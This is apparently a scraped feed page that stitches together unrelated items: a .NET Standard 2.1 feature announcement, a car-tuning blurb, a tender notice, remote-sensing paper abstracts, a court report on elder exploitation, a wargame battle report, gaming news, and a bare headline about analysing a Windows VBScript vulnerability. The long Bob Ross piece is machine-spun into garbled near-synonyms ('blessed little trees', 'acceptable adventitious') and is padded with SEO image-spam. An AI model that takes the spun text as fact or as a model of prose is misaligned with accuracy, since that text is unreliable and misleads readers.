  • Reflection emit. To boost productivity, the .NET ecosystem has always made heavy use of dynamic features such as reflection and reflection emit. Emit is often used as a tool to optimize performance as well as a way to generate types on the fly for proxying interfaces. As a result, many of you asked for reflection emit to be included in the .NET Standard. Previously, we’ve tried to provide this via a NuGet package but we discovered that we cannot model such a core technology using a package. With .NET Standard 2.1, you’ll have access to Lightweight Code Generation (LCG) as well as Reflection Emit. Of course, you might run on a runtime that doesn’t support running IL via interpretation or compiling it with a JIT, so we also exposed two new capability APIs that allow you to check for the ability to generate code at all (RuntimeFeature.IsDynamicCodeSupported) as well as whether the generated code is interpreted or compiled (RuntimeFeature.IsDynamicCodeCompiled). This will make it much easier to write libraries that can exploit these capabilities in a portable fashion.
  • SIMD. .NET Framework and .NET Core had support for SIMD for a while now. We’ve leveraged them to speed up basic operations in the BCL, such as string comparisons. We’ve received quite a few requests to expose these APIs in .NET Standard as the functionality requires runtime support and thus cannot be provided meaningfully as a NuGet package.
  • ValueTask and ValueTask<T>. In .NET Core 2.1, the biggest feature was improvements in our fundamentals to support high-performance scenarios, which also included making async/await more efficient. ValueTask<T> already exists and allows to return results if the operation completed synchronously without having to allocate a new Task<T>. With .NET Core 2.1 we’ve improved this further which made it useful to have a corresponding non-generic ValueTask that allows reducing allocations even for cases where the operation has to be completed asynchronously, a feature that types like Socket and NetworkStream now utilize. Exposing these APIs in .NET Standard 2.1 enables library authors to benefit from these improvements both, as a consumer, as well as a producer.
  • DbProviderFactories. In .NET Standard 2.0 we added almost all of the primitives in ADO.NET to allow O/R mappers and database implementers to communicate. Unfortunately, DbProviderFactories didn’t make the cut for 2.0 so we’re adding it now. In a nutshell, DbProviderFactories allows libraries and applications to utilize a specific ADO.NET provider without knowing any of its specific types at compile time, by selecting among registered DbProviderFactory instances based on a name, which can be read from, for example, configuration settings.
  • General Goodness. Since .NET Core was open sourced, we’ve added many small features across the base class libraries such as System.HashCode for combining hash codes or new overloads on System.String. There are about 800 new members in .NET Core and virtually all of them got added in .NET Standard 2.1.

For more details, you might want to check out the full API diff between .NET Standard 2.1 and .NET Standard 2.0. You can also use apisof.net to quickly check whether a given API will be included with .NET Standard 2.1.

.NET platform support

In case you missed our Update on .NET Core 3.0 and .NET Framework 4.8, we’ve described our support for .NET Framework and .NET Core as follows:

.NET Framework is the implementation of .NET that’s installed on over one billion machines and thus needs to remain as compatible as possible. Because of this, it moves at a slower pace than .NET Core. Even security and bug fixes can cause breaks in applications because applications depend on the previous behavior. We will make sure that .NET Framework always supports the latest networking protocols, security standards, and Windows features.

.NET Core is the open source, cross-platform, and fast-moving version of .NET. Because of its side-by-side nature it can take changes that we can’t risk applying back to .NET Framework. This means that .NET Core will get new APIs and language features over time that .NET Framework cannot. At Build we showed a demo how the file APIs are faster on .NET Core. If we put those same changes into .NET Framework we could break existing applications, and we don’t want to do that.

Given many of the API additions in .NET Standard 2.1 require runtime changes in order to be meaningful, .NET Framework 4.8 will remain on .NET Standard 2.0 rather than implement .NET Standard 2.1. .NET Core 3.0 as well as upcoming versions of Xamarin, Mono, and Unity will be updated to implement .NET Standard 2.1.

Library authors who need to support .NET Framework customers should stay on .NET Standard 2.0. In fact, most libraries should be able to stay on .NET Standard 2.0, as the API additions are largely for advanced scenarios. However, this doesn’t mean that library authors cannot take advantage of these APIs even if they have to support .NET Framework. In those cases they can use multi-targeting to compile for both .NET Standard 2.0 as well as .NET Standard 2.1. This allows writing code that can expose more features or provide a more efficient implementation on runtimes that support .NET Standard 2.1 while not giving up on the bigger reach that .NET Standard 2.0 offers.

For more recommendations on targeting, check out the brand new documentation on cross-platform targeting.

Governance model

The .NET Standard 1.x and 2.0 releases focused on exposing existing concepts. The bulk of the work was on the .NET Core side, as this platform started with a much smaller API set. Moving forward, we’ll often have to standardize brand-new technologies, which means we need to consider the impact on all .NET implementations, not just .NET Core, and including those managed in other communities such as Mono or Unity. Our governance model has been updated to best include all considerations, including:

A .NET Standard review board. To ensure we don’t end up adding large chunks of API surface that cannot be implemented, a review board will sign-off on API additions to the .NET Standard. The board comprises representatives from .NET platform, Xamarin and Mono, Unity and the .NET Foundation and will be chaired by Miguel de Icaza. We will continue to strive to make decisions based on consensus and will leverage Miguel’s extensive expertise and experience building .NET implementations that are supported by multiple parties when needed.

A formal approval process. The .NET Standard 1.x and 2.0 version were largely mechanically derived by computing which APIs existing .NET implementations had in common, which means the API sets were effectively a computational outcome. Moving forward, we are implementing an editorial approach:

  • Anyone can submit proposals for API additions to the .NET Standard.
  • New members on standardized types are automatically considered. To prevent accidental fragmentation, we’ll automatically consider all members added by any .NET implementation on types that are already in the standard. The rationale here is that divergence at that the member level is not desirable and unless there is something wrong with the API it’s likely a good addition.
  • Acceptance requires:
    • A sponsorship from a review board member. That person will be assigned the issue and is expected to shepherd the issue until it’s either accepted or rejected. If no board member is willing to sponsor the proposal, it will be considered rejected.
    • A stable implementation in at least one .NET implementation. The implementation must be licensed under an open source license that is compatible with MIT. This will allow other .NET implementations to jump- start their own implementations or simply take the feature as-is.
  • .NET Standard updates are planned and will generally follow a set of themes. We avoid releases with a large number of tiny features that aren’t part of a common set of scenarios. Instead, we try to define a set of goals that describe what kind of feature areas a particular .NET Standard version provides. This simplifies answering the question which .NET Standard a given library should depend on. It also makes it easier for .NET implementations to decide whether it’s worth implementing a higher version of .NET Standard.
  • The version number is subject to discussion and is generally a function of how significant the new version is. While we aren’t planning on making breaking changes, we’ll rev the major version if the new version adds large chunks of APIs (like when we doubled the number of APIs in .NET Standard 2.0) or has sizable changes in the overall developer experience (like the added compatibility mode for consuming .NET Framework libraries we added in .NET Standard 2.0).

For more information, take a look at the .NET Standard governance model and the .NET Standard review board.

Summary

The definition of .NET Standard 2.1 is ongoing. You can watch our progress on GitHub and still file requests.

If you want to quickly check whether a specific API is in .NET Standard (or any other .NET platform), you can use apisof.net. You can also use the .NET Portability Analyzer to check whether an existing project or binary can be ported to .NET Standard 2.1.

Happy coding!


          A Swiss tuning studio finds ways to make the iconic BMW X4 even more appealing      Cache   Translate Page      

What people think of Indian Summer is a vivid picture of magnificent colored leaves, blue skes and warm temperatures. And when we think of Indian Summer, we think about the new X4 (GO2) machine – a SAV coupe that has confidently positioned itself in the competitive lineup with X-Typical power and sexy looks. However, Dähler Design & Technik GmbH from Belp has decided to exploit the capabilities of the vehicle and add some sexy and functional additions. The result is simply astonishing, ...

A Swiss tuning studio finds ways to make the iconic BMW X4 even more appealing originally appeared on automobilesreview.com on Monday, 05 Nov 2018 09:31:16 EST



          Exploitation of the souk amhirich      Cache   Translate Page      
Tenders are invited for exploitation of the souk amhirich

Place of performance: guelmim.

Provisional deposit: 1 200 000,00 mad.

Estimate: (en dhs ttc) 86 000,00.

Date and time for submission of folds: 29/11/2018 11:00.
          Compensating Earth Ionosphere Phase Distortion in Spaceborne VHF Radar Sounders for Subsurface Investigations      Cache   Translate Page      
Spaceborne low-frequency and wide bandwidth radar sounders are a promising technology to regularly investigate at global-scale Earth’s icy and arid regions. However, Earth ionosphere distorts the radar signal impacting performance parameters, such as subsurface resolution, of the radar system. One of the most relevant distortions that a sounder signal in the lower part of the very high-frequency (VHF) band (e.g., 40–50 MHz) encounters is the distortion of the phase component that could become mission critical if not properly compensated. Low-frequency and high fractional bandwidth radar systems are particularly affected by this issue. Previous works on radar sounder ionosphere phase distortion compensation addressed the Martian ionosphere and used techniques based on the Taylor series expansion. In this letter, we focus on the Earth ionosphere and we exploit a recently proposed ionosphere compensation technique based on the Legendre orthogonal polynomials expansion, which proved to be more accurate than the compensation based on Taylor expansion. Simulations show that the method allows a nominal compensation of the phase distortions under realistic ionosphere scenarios expected during the acquisitions. Furthermore, it proved to be accurate and robust for total electron content conditions expected during nighttime for all the geomagnetic latitudes. The results confirm that the method can accurately compensate the distorting effects on the phase component of a spaceborne VHF radar sounder.
          A UEP Method for Imaging Low-Orbit Satellites Based on CCSDS Recommendations      Cache   Translate Page      
Remote sensing satellites allow continuous information acquisition from large areas of the earth and have been intensively applied in a number of applications, from agriculture to defense. A major challenge in remote sensing is that satellite communication systems present bandwidth restrictions and several issues typical of time-variant channels, which justifies the need for signal coding techniques. In that sense, this letter proposes an unequal error protection method for aerospace applications using the recommendations for source and channel coding created by the Consultative Committee for Space Data System (CCSDS) as frameworks. The proposed method makes use of the CCSDS-recommended convolutional code to ensure a channel coding step as low complex as possible, which allows implementation in a wide range of embedded platforms. This letter exploits the natural data division delivered by the compressor to unequally protect the information. The proposed method, which relies on a multiobjective optimization problem, allows one to find rate arrangements that minimize the distortion of the received image for a given value of an average coding rate within a granular range. The system performance is evaluated over an additive white Gaussian noise channel model. The obtained results show that the proposed method presents several advantages over an equal error protection strategy, and paves the way for scenarios with stringent energy and bandwidth constraints.
          Tiny and Dim Infrared Target Detection Based on Weighted Local Contrast      Cache   Translate Page      
Robust detection of infrared (IR) tiny and dim targets in a single frame remains a hot and difficult problem in military fields. In this letter, we introduce a method for IR tiny and dim target detection based on a new weighted local contrast measure. Our method simultaneously exploits the local contrast of target, the consistency of image background, and the imaging characteristics of the background edges. The proposed method is simple to implement and computationally efficient. We compared our algorithm with six state-of-the-art methods on four real-world videos with different targets and backgrounds. Our method outperforms all the compared algorithms on the ground-truth evaluation with both higher detection rate and lower false alarm rate.
          Madagascar kicks off fresh round      Cache   Translate Page      
Island nation puts 44 blocks up for grabs, detailing exploration and exploitation periods under PSCs
          The Coastal Star posted a blog post      Cache   Translate Page      
The Coastal Star posted a blog post

Highland Beach: Prosecutors file additional charges against man suspected of stealing nearly $3M from slain widow

David Del Rio in court with Gregory Salnick, one of his attorneys. Tim Stepien/The Coastal StarBy Rich PollackPalm Beach County prosecutors Monday filed 44 additional grand theft and exploitation of the elderly charges against David Del Rio, a financial adviser charged with siphoning nearly $3 million from Elizabeth “Betty” Cabral, an 85-year-old Highland Beach widow found murdered in April.During a bail hearing for Del Rio, who has not been charged in connection with the homicide, prosecutors revealed that someone cut Cabral’s throat while she slept.Palm Beach County Circuit Judge Glenn Kelley set bail at $463,000 for all 72 counts against Del Rio, who will remain in custody until defense attorneys can prove that any money he might use to post bail wasn’t obtained through unauthorized withdrawals from Cabral’s accounts.During the hearing, prosecutors argued that Del Rio, 35, befriended Cabral and her husband William and took advantage of their trust to pilfer money from their bank accounts.“What he was doing was using his relationship with that couple to steal their life savings,” Assistant State Attorney Brian Fernandes told Kelley. “He spent hours and hours a day so he could exploit them.”Del Rio has been in custody since his arrest in mid-September when he was charged with 27 counts of grand theft, exploitation of the elderly, money laundering and fraudulent use of personal identification information. The additional charges filed Monday stem from new information investigators found in looking at financial records going back to 2013.Investigator have said in court documents they think Del Rio fraudulently changed the will of Betty and William Cabral, making himself the sole beneficiary of the estate. William Cabral died in April of 2017 at 88.Fernandes and prosecutor Aleathea McRoberts focused their arguments during Monday’s bail hearing on convincing Kelley that Del Rio was a danger to the community and should have bail set at $1 million. Del Rio’s attorneys asked the judge to set bail between $75,000 and $125,000, claiming Del Rio was neither a flight risk nor someone about whom the community should be concerned.Defense attorney Michael Salnick presented several witnesses who said Del Rio was a good man and someone Betty Cabral thought of as a son.“As a friend it’s hard for me to believe all this,” said Nick Simpson, who knows Del Rio through their church. “The charges that are being thrown at him are so far outside what I know David to be.”Salnick argued that Del Rio has known since May that he was under investigation but did not try to flee, instead staying at home in Lehigh Acres is Lee County on Florida’s West Coast with his wife and four children.Prosecutors, however, argued that Del Rio would have good reason to flee because of the volume of charges against him.“He’s facing the potential of life in prison for the crimes he committed,” Fernandes said.In setting the requirements associated with bail that included house arrest for Del Rio and a prohibition against him contacting any members of the Cabral family, Kelley acknowledged that Del Rio would remain in jail while attorneys sort out from where Del Rio would get the money for bail.Several friends and family members said they would lend money to Del Rio to help him make bail, but that amounted to less than $15,000.Relatives of Betty and William Cabral were also called on to testify, with one great niece saying Betty Cabral was concerned that her money was disappearing.During her testimony, Maureen Forte said her aunt called her crying early this year because Del Rio told her she no longer had enough money to pay for home health care.Forte said she reached out to Del Rio asking for a financial accounting of expenses but never heard back, which she said was unusual.Also testifying on behalf of the prosecution was Palm Beach County Sheriff’s Det. Robert Drake, who said investigators think Del Rio used money taken from the Cabrals to buy expensive cars and to make home improvements.He said Del Rio purchased two Audi vehicles, a Porsche, a recreational vehicle, two motorcycles, a smart car and a Chevy Silverado for a friend all in one year.In looking at financial records, detectives could not find evidence that Del Rio used any money from Cabral’s accounts to pay her bills.“I never found one penny that was paid from Del Rio’s account to care for the Cabrals,” Drake said.See More

          Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour      Cache   Translate Page      

paintingnature.club posted a photo:

Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour

via WordPress ift.tt/2PNAobu

Whether or not you’re artistically inclined, there’s a acceptable adventitious that you—like millions of added bodies about the world—have been captivated by Bob Ross’s advisory mural paintings and abatement voice. On what would accept been Ross’s 76th birthday, we’re administration 35 facts about the blessed little legend.

Getting Started With Watercolor: What You Need to Know – paint watercolour | paint watercolour

A constant beastly lover, Ross was consistently rescuing blood-soaked animals and nursing them aback to health. As a kid growing up in Florida, this meant one rather aberrant accession to the family: an alligator, which he attempted to abettor aback to bloom in the Ross ancestors bathtub. Alike in his developed life, Ross was consistently arena host to orphaned and afflicted animals, including an epileptic accumulate that lived in his abandoned Jacuzzi.

Ross’s quiet articulation and affable address were two of his best iconic traits, which makes the actuality that he spent 20 years in the United States Air Force and retired with the rank of adept baker all the added surprising. Basically, he was the guy who told anybody abroad what to do.

Before he lent his adapted articulation to The Joy of Painting, Ross spent a lot of time yelling. “I was the guy who makes you abrade the latrine, the guy who makes you accomplish your bed, the guy who screams at you for actuality backward to work,” Ross already said. “The job requires you to be a mean, boxy person. And I was fed up with it. I promised myself that if I anytime got abroad from it, it wasn’t activity to be that way anymore.”

While stationed in Alaska during his assignment in the Air Force, Ross advantaged his artistic ancillary by painting his now-iconic landscapes assimilate aureate pans, which he awash for $25 apiece. Today, they can aback as abundant as $7500 on eBay.

From 1974 to 1982, German painter Bill Alexander hosted an art apprenticeship appearance on PBS, The Magic of Oil Painting, area he aggregate his “wet-on-wet” oil painting technique. Ross apparent the alternation while alive as a bartender, and became an actual fan of the artist. He concluded up belief beneath Alexander, who became his mentor. In fact, Ross committed the aboriginal adventure of his own PBS show, The Joy of Painting, to Alexander. “Years ago, Bill accomplished me this absurd technique,” Ross told viewers. “And I feel as admitting he gave me a adored gift, and I’d like to allotment that allowance with you.”

In the aboriginal 1980s, as Alexander was advancing to retire, he asked Ross to booty over teaching his painting classes. Ross agreed, and set out to bout the country on his own in a motor home, traveling and teaching bodies Alexander’s “wet-on-wet” technique. He told his wife Jane that he’d try it out for one year, and if he didn’t accomplish abundant money, he would acknowledgment to Alaska.

It was during Ross’s time on the alley that he adopted his iconic hairstyle. Back teaching painting wasn’t an acutely advantageous profession, Ross abstruse to amplitude every penny. One way he did this was to save money on haircuts by accepting his locks permed.

Though Ross reportedly hated the coiled hair, he was a agent first, which is why he kept it. “When we got a band of paints and brushes, we put his account on,” Bob Ross Aggregation co-founder Annette Kowalski told Mental Floss. “The logo is a account of Bob with that hair, so he could never get it cut. He wasn’t consistently blessed about that.”

(You can see what he looked like afterwards his brand perm here.)

Though it was Alexander who got Ross started on his career aisle as an artist, it was Kowalski—one of Ross’s students—who put him on the pop ability map. Kowalski, who is generally accustomed as the woman who “discovered” Ross, took a five-day advisory advance with Ross in 1982, and bound became amorous with his abstracted articulation and absolute messages.

In accession to newfound painting skills, Kowalski larboard the chic with a new client: she became Ross’s manager, allowance him agent the accord for The Joy of Painting television appearance with PBS, and later, a band of Bob Ross art supplies.

Watercolour Paint Tin – Baker Ross – paint watercolour | paint watercolour

The Joy of Painting ran new seasons on PBS from 1983 to 1994, so alike at accessible broadcasting ante the appearance charge accept fabricated Ross absolutely a bit of loot, right? Not quite. Ross absolutely did the alternation for free; his assets came from Bob Ross Inc.

Ross’s aggregation awash art food and how-to videotapes, accomplished classes, and alike had a affiliation of traveling art advisers who roamed the apple teaching painting. It’s boxy to anticipate of a bigger advertisement for these articles than Ross’s show.

How did Ross acquisition the time to band all of those shows for free? He could almanac a division about as fast as he could paint. Ross could blast out an absolute 13-episode division of The Joy of Painting in aloof over two days, which freed him up to get aback to teaching lessons, which is area he fabricated his absolute money.

In accession to actuality agitated by about 95 percent of all accessible television stations beyond America, extensive admirers in added than 93.5 actor homes, The Joy of Painting was a hit alfresco of the U.S. as well. The appearance was advertisement in dozens of adopted countries, including the United Kingdom, Germany, Belgium, Switzerland, South Korea, and Turkey.

The Joy of Painting was a big hit in Japan, area it aired alert a day. (His voice, however, was dubbed.) On a appointment to the country, Ross was reportedly chock-full by fans.

“We’re like biologic dealers,” Ross already said of the acceptance of his painting technique. “Come into boondocks and get everybody absolutely absorbed to painting. It doesn’t booty abundant to get you addicted.”

Though he was assuredly a pop ability phenomenon, the art apple didn’t absolutely embrace Ross. “People absolutely apperceive who he is,” Kevin Lavin, a “struggling” painter, told The New York Times in 1991. “In his own way, he is as acclaimed as Warhol.”

“It is formulaic and thoughtless,” sculptor Keith Frank said of Ross’s assignment in the aforementioned article. “Art as therapy.”

“I am abashed by art apprenticeship on television,” added Abstract Expressionist Richard Pousette-Dart, who anesthetized abroad the afterward year. “It’s terrible—bad, bad, bad. They are aloof bartering exploiters, non-artists teaching added non-artists.”

The New York Times paid a appointment to Pearl Acrylic Company, an art accumulation abundance in New York City, area an agent acicular to the “happy little corner” area they kept Ross’s products. “We adumbrate them,” he admitted, “so as not to offend.”

Bill Alexander was one of the artists who wasn’t captivated with Ross’s success, alike admitting he had been his protégé. “He betrayed me,” Alexander told The New York Times. “I invented ‘wet on wet.’ I accomplished him and he is artful me—what bothers me is not aloof that he betrayed me, but that he thinks he can do it better.”

Easy Abstract Watercolor Painting For Beginners | Page Flutter – paint watercolour | paint watercolour

Though allotment of Ross’s address was his communicative tone, none of this allocution of blessed accidents or added blessed little things was ad libbed. “He told me he would lay in bed at night and plan every word,” Kowalski already said. “He knew absolutely what he was doing.”

Though you’d never apperceive it from his painting technique, not all of Ross’s digits were intact. He absent allotment of his larboard basis feel back he was a kid in a woodworking blow while alive with his dad, who was a carpenter.

While copse and wildlife generally helped accompany Ross’s paintings to life, he rarely corrective people. In fact, he admired to accumulate his assignment as people-free as possible.

“I will acquaint you Bob’s better secret,” Kowalski told FiveThirtyEight. “If you notice, his cabins never had chimneys on them. That’s because chimneys represented people, and he didn’t appetite any assurance of a actuality in his paintings.”

The Joy of Painting consistently featured a alternating casting of blessed little animals, with a tiny accumulate alleged Peapod apparently accepting the aggregate of airtime. According to Ross, Peapod admired to sit in his pocket.

Though The Joy of Painting was a admired series, bodies didn’t assume to be watching it to apprentice how to be the abutting Picasso. It was already estimated that alone 10 percent of admirers were absolutely painting forth with Ross.

In 2014, FiveThirtyEight did a statistical breakdown of Ross’s assignment on The Joy of Painting and begin that 91 percent of them included at atomic one tree—by far the best accepted element. (And if he corrective one tree, there was a 93 percent adventitious he’d acrylic a added one—though he referred to any added copse as “friends” on the show.)

On a few occasions, Ross’s son Steve subbed for his dad as a bedfellow host. That aforementioned abstracts set apparent that Steve admired blessed little lakes: 91 percent of Steve’s paintings featured one (as against to Bob’s 34 percent).

Ross attempt 403 episodes of The Joy of Painting and fabricated three near-exact copies of anniversary painting per episode. The aboriginal archetype consistently hid off screen, and Ross referred to it while the cameras formed (none of his on-air paintings were spontaneous). Ross corrective a third archetype back filming finished. This time, an abettor would angle abaft him and breeze photos of anniversary brushstroke; these pictures went into his how-to books.

For all his accepted popularity, there aren’t a lot of interviews with Ross. It has annihilation to do with the artisan actuality publicity-shy—it’s aloof that bodies rarely asked. “I never about-face bottomward requests for interviews,” he already said. “I’m aloof rarely asked.”

For all his hokey-ness, Ross was air-conditioned abundant to be asked to be a bell-ringer for MTV—which he accounted “The acreage of blessed little trees.”

Great Ideas with Watercolor Paint – paint watercolour | paint watercolour

Though some anticipation it was an April Fools’ joke, Nintendo had affairs to actualize a alternation of video amateur based on The Joy of Painting. Unfortunately, the activity ran into assembly problems appealing aboriginal on, so we’ll never apperceive what ability accept been.

In 2001, Bob Ross Inc. media administrator Joan Kowalski told The New York Times how bodies about seemed ashamed to accept that Ross’s articulation was the absolute band-aid to insomnia. “It’s funny to allocution to these people,” she said. ”Because they anticipate they’re the alone ones who watch to booty a nap. Bob knew about this. Bodies would appear up to him and say, ‘I don’t appetite to aching your feelings, but you’ve been putting me to beddy-bye for 10 years.’ He’d adulation it.”

Even today, Ross has become an ASMR star: On the ASMR cilia on Reddit, “Bob Ross” is listed as a accepted trigger. A video of Ross painting a abundance has a amazing 7.65 actor views, with others consistently before 2 or 3 actor views. Of course, not all of those are ASMR viewers, but a ascent online attendance suggests they absolutely deserve some of the credit.

In a 1991 account with The New York Times, Ross claimed he’d fabricated over 30,000 paintings back he was an 18-year-old stationed in Alaska with the Air Force. Yet he was not one to militarist his own work. So what happened to them? Back Ross died of lymphoma in 1995, best of his paintings either concluded up in the easily of alms or PBS.

“One of the questions that I apprehend over and over and over is, ‘What do we do with all these paintings we do on television?’ Best of these paintings are donated to PBS stations beyond the country,” he said. “They bargain them off, and they accomplish a blessed blade with ‘em. So if you’d like to accept one, get in blow with your PBS station, account … we accord them to stations all over the country to advice them out with their fundraisers.”

The actuality that Ross didn’t try and about-face a accumulation from his own assignment doesn’t beggarly that you can’t acquisition one for sale. At one point, added than a dozen of his paintings hit the atramentous bazaar back accession blanket 13 advertence paintings from Ross’s van during the show’s added season.

In the aboriginal 1990s, Ross was attractive to annex out from art and had an abstraction for a kids’ appearance alleged Bob’s World, area he planned to go out into attributes and advise kids about wildlife.

The Bob Ross Art Workshop in New Smyrna Beach, Florida is a must-visit destination for Ross die-hards: In accession to alms art classes in Ross’s method, you’ll acquisition a accumulating of the artist’s aboriginal paintings.

Two Inch Brush—named afterwards Ross’s besom of best for the wet-on-wet technique—is an actionable database that organizes all 403 paintings from The Joy of Painting by division and episode.

In August 2017, Funko appear a vinyl baby of the iconic artist/television personality. It depicts Ross dressed in his brand jeans and accepted shirt, captivation a painter’s palette. Sadly, it doesn’t appear with any miniature paintings of “happy little trees.”

Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour – paint watercolour
| Delightful to help the website, in this time period I will show you in relation to keyword. Now, this can be a 1st image:

Paint the realistic still life with Watercolor A (Momotaro … – paint watercolour | paint watercolour

What about image preceding? is usually which wonderful???. if you feel thus, I’l d explain to you several impression again underneath:

So, if you wish to receive all of these great shots regarding (Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour), simply click save button to download the photos for your personal pc. They are all set for down load, if you love and wish to grab it, simply click save badge on the web page, and it will be instantly downloaded in your laptop.} As a final point if you like to obtain new and latest picture related with (Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour), please follow us on google plus or save this blog, we try our best to present you daily up-date with fresh and new pictures. Hope you love keeping here. For most up-dates and latest news about (Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour) shots, please kindly follow us on twitter, path, Instagram and google plus, or you mark this page on bookmark section, We try to present you update regularly with fresh and new images, love your surfing, and find the best for you.

Thanks for visiting our site, contentabove (Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour) published . At this time we are excited to announce we have discovered an extremelyinteresting nicheto be reviewed, namely (Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour) Some people trying to find info about(Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour) and definitely one of these is you, is not it?

Watercolor painting for beginners (simple and easy) – YouTube – paint watercolour | paint watercolour

Watercolor painting for beginners (simple and easy) – YouTube – paint watercolour | paint watercolour

Simple watercolor paintings for beginner watercolor artists – paint watercolour | paint watercolour

Easy step by step watercolor tutorial: Painting The Blue Ridge … – paint watercolour | paint watercolour

Easy step by step watercolor tutorial: Painting The Blue Ridge … – paint watercolour | paint watercolour

Easy step by step watercolor tutorial: Painting The Blue Ridge … – paint watercolour | paint watercolour

29 Kremer Watercolour Set 29 Watercolours for Landscape Painting – paint watercolour | paint watercolour

Easy step by step watercolor tutorial: Painting The Blue Ridge … – paint watercolour | paint watercolour

How to paint realistic apple blossom in watercolour with Anna Mason … – paint watercolour | paint watercolour

29 Disc Watercolour Paint Set With Brush – Gompels HealthCare – paint watercolour | paint watercolour

29 Disc Watercolour Paint Set With Brush – Gompels HealthCare – paint watercolour | paint watercolour

How to Paint Windows in Watercolour | ArtTutor – paint watercolour | paint watercolour

Beginners Watercolour Painting – Tea & Crafting – paint watercolour | paint watercolour

Beginners Watercolour Painting – Tea & Crafting – paint watercolour | paint watercolour

Watercolor Paintings Landscape Gallery – paint watercolour | paint watercolour

Beginners Watercolour Painting – Tea & Crafting – paint watercolour | paint watercolour

Watercolor Paintings Landscape Gallery – paint watercolour | paint watercolour

Watercolor Paintings Landscape Gallery – paint watercolour | paint watercolour

Watercolor Paintings Landscape Gallery – paint watercolour | paint watercolour

Watercolor Paintings Landscape Gallery – paint watercolour | paint watercolour

Watercolour Paint Tin – Baker Ross – paint watercolour | paint watercolour

Watercolour Watercolor Paint · Free image on Pixabay – paint watercolour | paint watercolour

Watercolour Paint Set 29Ml 29 Pack | Hobbycraft – paint watercolour | paint watercolour

Watercolour Paint Set 29Ml 29 Pack | Hobbycraft – paint watercolour | paint watercolour

The post Reasons Why Paint Watercolour Is Getting More Popular In The Past Decade | paint watercolour appeared first on Painting Nature.


          Battle of Saltanovka - Part I of II      Cache   Translate Page      
Last saturday we played a game of Black Powder at our club, the first of the scenarios of the Clash of Eagles supplement - the battle of Saltanovka.

The supplement illustrates this battle with these words: 

" Bagration's intention to join the First Western Army by crossing the Dnieper River at Mogilev has been thwarted by the French under Davout. Bagration decides to throw Raevsky's VII Corps at Davout's positions, if the French are weak then Raevsky will easily succeed through weight of numbers. If the French prove stronger than thought, then Raevsky can fight a delaying action giving Bagration time to cross the Dnieper elsewhere."

SAM_1590

We had to do some adjustments on each army's forces, as I don't have all elements included on the army lists given - napoleonic history freaks may cringe reading this report, as a lot of units are not what they where in the real battle!

SAM_1567

Above, our table at setup, with the french infantry positioned on the northern banks of the Saltanovka river, holding the namesake village to their left (right side of the table) and the village of Fatova, to their right (left side of the table).

The rest of the french forces (a brigade of infantry and a divison of cavalry) was to enter the game on later turns. The russians start the game with everything off the table.

I was in charge of the French, while my friend Leon took command of the Russian forces. Our game began with Kolubakin's forces pushing onto the table straight towards the river, attempting to ford it and hold some ground in the northern banks, thus allowing cavalry to cross the bridge safely.

SAM_1569

SAM_1570
Above, russian hussars and cossacks rush for the bridge while the Russian infantry fights a bloodly clash with the French over the banks of the Saltanovka.


SAM_1572
For a moment, it seems the Russian Cavalry will succeed at grasping a bridgehead.


SAM_1573
But a French battalion is dispatched to form square at the foot of the bridge and hold the enemy cavalry at all costs.

On the Russian left flank, facing the village of Fatova, Paskevitch's divison marches to sight of the enemy, but then halt their advance at several hundred yards of the river. There is a single French infantry brigade positioned to oppose them if they attempt to push through the bridge. 

SAM_1571


SAM_1574

On the second game turn, the Young Guard arrives and is directed to support the efforts at Saltanovka, where the river is turning red with French and Russian blood, as the armies wear each other down in bitter struggle.

The French cavalry arrives on turn 3, and is also dispatched to that village, since the Russians so far have not made an advance on Fatova.

SAM_1575
Masses of French Cuirassiers and Dragoons ride ponderously towards the enemy. With such a mass of horses poised to strike, it'd now be foolish for the Russian Infantry to cross to the northern banks here.

SAM_1576
The battle on the Saltanovka village, once the Young Guard and French Cavalry arrive. 

The French infantry facing the Russian regiments on the banks of the river are ordered to fall back, so to entice the enemy to advance and cross the river, making themselves a target for the French Cavalry - but the Russian commander sees the danger and holds his ranks!

Raevsky decides it's time to exploit the much weaker French right flank, at Fatova.

Stay tunned for part II of this Battle Report!

          Evolution delivers complex solutions: In the Nucleus, Genes’ Activity Might Depend on Their Location      Cache   Translate Page      
Evolution automatically exploits every possibility—blindly (and thus unusual solutions appear).. Jordana Cepelewicz writes in Quanta: The nucleus of a cell has something in common with a cardboard box full of kittens: People get so fascinated by the contents that they overlook the container. The nucleus itself is often treated as no more than a featureless […]
          Commentaires sur PAG : Première grande toilette  pour le stade de  l’amitié 36 ans après par gerosa1961      Cache   Translate Page      
Ce qui n'ont aucune notion de gestion d'infrastructures peuvent croire à la propagande que vous faites d'un tel acte. Pour les initiés, toute infrastructures à une durée de vie car subissant de dépréciation. Dans un tel cas, soit vous décidez sa réhabilité on en tant que gestionnaire du moment, ce qui ressortirait de la norme vous décidez d'en ériger un autre qui ferait votre exploit. Donc laisser nous respirer
          BARCELONA FC planning to exploit SKRINIAR-Inter extension troubles      Cache   Translate Page      
While Inter Milan are still trying to talk Slovakian international centre-back Milan Skriniar (23) into accepting a 2.
          Ligue des champions: Paris manque l'exploit à Naples mais sauve ses chances de qualification (LaProvence)      Cache   Translate Page      
Naples (Italie) - L'enfer promis du San Paolo a failli se transformer en paradis : le Paris SG, incapable de profiter de la défaite de Liverpool en concédant le nul sur le terrain de Naples (1-1) mardi soir, reste troisième du groupe "de la...
          The Fallout 76 beta is getting 30GB worth of patching      Cache   Translate Page      

A chuffing 30 gigglebytes of patching needs to be done to Fallout 76, with fixes ranging from minor to massive thanks to exploits such as a frame-rate bug that allows people to pretend that they’re the Flash as they scoot away from danger.

The post The Fallout 76 beta is getting 30GB worth of patching appeared first on Critical Hit.


          Windows VBScript引擎远程执行代码漏洞 CVE-2018-8174分析与利用      Cache   Translate Page      
